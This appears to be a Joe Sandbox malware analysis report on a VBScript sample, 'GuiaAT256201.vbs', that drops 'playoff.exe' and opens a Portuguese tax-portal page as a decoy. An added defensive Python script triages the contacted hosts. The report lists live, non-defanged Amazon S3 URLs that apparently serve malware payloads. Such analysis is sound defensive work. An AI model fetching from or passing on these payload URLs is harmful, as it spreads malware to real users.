https://www.acesso.gov.pt/autentica_static/js/smartresize.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/css/bootstrap.min.css?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/img/autenticacaogov.png | false | - | high
https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/icons/favicon.ico | false | - | high
https://www.acesso.gov.pt/autentica_static/js/footer/footer.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/js/capslock-login.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/img/background.png | false | - | high
https://www.acesso.gov.pt/autentica_static/css/tabs.css?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/img/logo-at.png | false | - | high
https://www.acesso.gov.pt/autentica_static/js/app.js?cb=5.2.14 | false | - | high
https://playoffchampions.s3.eu-north-1.amazonaws.com/xboxtv.mpeg | true | Avira URL Cloud: safe | unknown
https://www.acesso.gov.pt/autentica_static/js/modernizr.js?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/img/iconGovPt_20x20.png | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAP | false | - | high
https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/pf/css/pf-main.css?cb=5.2.14 | false | - | high
https://www.acesso.gov.pt/autentica_static/pf/css/footer.css?cb=5.2.14 | false | - | high
URLs from memory and dropped files (Name | Source | Malicious | Antivirus Detection | Reputation):
http://fontawesome.io | chromecache_94.4.dr | false | - | high
https://info.portaldasfinancas.gov.pt/pt/quem_somos/privacidade/Pages/privacidade.aspx | chromecache_92.4.dr, chromecache_120.4.dr | false | Avira URL Cloud: safe | unknown
http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/ | chromecache_100.4.dr, chromecache_113.4.dr | false | Avira URL Cloud: safe | unknown
https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/CafeMusic.mpeg | playoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://www.acesso.gov.pt/v2/loginForm?partID=PFAPtCookiesgCj | wscript.exe, 00000000.00000003.2053801050.00000233BA521000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAP86 | wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://jqueryvalidation.org/ | chromecache_117.4.dr, chromecache_108.4.dr | false | - | high
http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-pref | chromecache_96.4.dr, chromecache_103.4.dr | false | Avira URL Cloud: safe | unknown
http://fontawesome.io/license | chromecache_94.4.dr | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAPc | wscript.exe, 00000000.00000003.2050678399.00000233BA6FA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/DanceMarine.mpeg | playoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://www.acesso.gov.pt/v2/loginForm?partID=PFAPQ60 | wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.acesso.gov.pt/v2/loginFo | wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://getbootstrap.com) | chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.dr | false | - | high
https://github.com/twbs/bootstrap/blob/master/LICENSE) | chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.dr | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAPL- | wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAPp | wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAPC: | wscript.exe, 00000000.00000003.2053993426.00000233BA572000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAP76R | wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.acesso.gov.pt/v2/loginForm?partID=PFAP9 | wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://info.portaldasfinancas.gov.pt/pt/at/Pages/Encarregado_protecao_dados.aspx | chromecache_92.4.dr, chromecache_120.4.dr | false | Avira URL Cloud: safe | unknown
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 62.28.254.209 | static.portaldasfinancas.gov.pt | Portugal | PT | 15525 | MEO-EMPRESAS | false |
| 62.28.254.215 | www.acesso.gov.pt | Portugal | PT | 15525 | MEO-EMPRESAS | false |
| 3.5.216.50 | s3-r-w.eu-north-1.amazonaws.com | United States | US | 16509 | AMAZON-02 | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | unknown | false |
| 142.250.185.196 | www.google.com | United States | US | 15169 | GOOGLE | false |

Practitioner notes: 239.255.255.250 is the SSDP multicast address used by Windows network discovery and is analysis-environment noise, not attacker infrastructure. The two gov.pt hosts are the decoy login page opened in Chrome. The S3 endpoint is the host in the same region as the bucket URL found in the dropped playoff.exe, so it is the one to treat as a download source even though the sandbox marks it "Malicious: false" (a shared AWS endpoint is not flagged as a whole).
Private IPs (analysis network, not indicators): 192.168.2.5, 192.168.2.13, 192.168.2.23, 192.168.2.14
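To show how an analyst turns the contacted-host tables above into a short indicator list, here is an added Python example (not part of the Joe Sandbox report or its tooling). It classifies each address the way the sandbox's own whitelist does: multicast and private ranges are dropped as noise, addresses from the report's excluded-IP list are dropped as known-benign, the gov.pt decoy and Google background traffic are labelled, and whatever remains is emitted defanged. The input rows are copied from the report; the whitelist is a small subset of the report's excluded IPs; treating gov.pt as a decoy rather than infrastructure is an assumption drawn from the process tree.

```python
import ipaddress
from dataclasses import dataclass

# Contacted hosts, taken from the report's IP table above (plus one private
# address from the analysis network) so the example runs offline.
CONTACTED = [
    ("62.28.254.209", "static.portaldasfinancas.gov.pt"),
    ("62.28.254.215", "www.acesso.gov.pt"),
    ("3.5.216.50", "s3-r-w.eu-north-1.amazonaws.com"),
    ("239.255.255.250", "unknown"),
    ("142.250.185.196", "www.google.com"),
    ("192.168.2.5", ""),
]

# Small subset of the addresses the sandbox excluded as known-benign
# ("Excluded IPs from analysis (whitelisted)" in the report).
SANDBOX_WHITELIST = {"172.217.18.3", "142.250.186.46", "13.107.253.45"}

# Domain suffixes of the lure the script opens in Chrome. Assumption: the
# Portuguese tax-authority portal is a legitimate decoy, not attacker C2.
DECOY_SUFFIXES = (".gov.pt",)

# Browser/update background traffic; these suffixes appear in the report's
# "Excluded domains from analysis" list.
BROWSER_NOISE_SUFFIXES = (".google.com", ".googleapis.com", ".gvt1.com")


@dataclass(frozen=True)
class Verdict:
    ip: str
    domain: str
    category: str  # noise | whitelisted | decoy | browser | candidate
    reason: str


def classify(ip: str, domain: str) -> Verdict:
    """Bucket one contacted host; only 'candidate' hosts are worth blocking."""
    addr = ipaddress.ip_address(ip)
    # Multicast (SSDP 239.255.255.250), RFC 1918, loopback and link-local
    # addresses are analysis-environment noise, never attacker infrastructure.
    if (addr.is_multicast or addr.is_private or addr.is_loopback
            or addr.is_link_local or addr.is_reserved):
        return Verdict(ip, domain, "noise", "non-routable or multicast address")
    if ip in SANDBOX_WHITELIST:
        return Verdict(ip, domain, "whitelisted", "excluded by the sandbox as known-benign")
    if domain.endswith(DECOY_SUFFIXES):
        return Verdict(ip, domain, "decoy", "legitimate site opened as a lure")
    if domain.endswith(BROWSER_NOISE_SUFFIXES):
        return Verdict(ip, domain, "browser", "Chrome/Google background traffic")
    return Verdict(ip, domain, "candidate",
                   "routable and not explained by the lure or the browser; "
                   "correlate with URLs found in dropped files")


def defang(ip: str) -> str:
    """Make an indicator safe to paste into tickets and chat."""
    return ip.replace(".", "[.]")


def triage(rows):
    """Classify every (ip, domain) row in order."""
    return [classify(ip, domain) for ip, domain in rows]


def candidates(rows):
    """Defanged list of hosts that survive all filters."""
    return [defang(v.ip) for v in triage(rows) if v.category == "candidate"]


if __name__ == "__main__":
    for v in triage(CONTACTED):
        print(f"{v.category:<11} {v.ip:<16} {v.domain:<36} {v.reason}")
    print("candidate IoCs:", candidates(CONTACTED))
```

Run against the report's rows, the only host left in the candidate bucket is the eu-north-1 S3 endpoint, which is consistent with the bucket URL carved from playoff.exe. The whitelist is deliberately a plain set so it can be replaced by the full excluded-IP list from the report, or by an organisation's own allow-list, without touching the classification logic.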
                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1597922
                                                                                      Start date and time:2025-01-23 19:06:16 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 5m 55s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:GuiaAT256201.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal76.evad.winVBS@18/69@11/9
                                                                                      EGA Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.18.3, 216.58.206.46, 173.194.76.84, 142.250.186.46, 142.250.184.238, 142.250.185.174, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.184.202, 216.58.212.170, 172.217.18.10, 142.250.185.74, 172.217.16.202, 216.58.212.138, 216.58.206.42, 172.217.18.106, 142.250.186.42, 142.250.184.234, 142.250.186.106, 172.217.23.106, 142.250.186.170, 217.20.57.41, 2.23.77.188, 172.217.18.14, 142.250.181.238, 142.250.185.78, 142.250.186.78, 216.58.212.142, 142.250.185.227, 142.250.185.206, 184.28.90.27, 4.175.87.197, 13.107.253.45
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
• Execution Graph export aborted for target playoff.exe, PID 8028 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 13:07:25 | API Interceptor | 2x Sleep call for process: playoff.exe modified |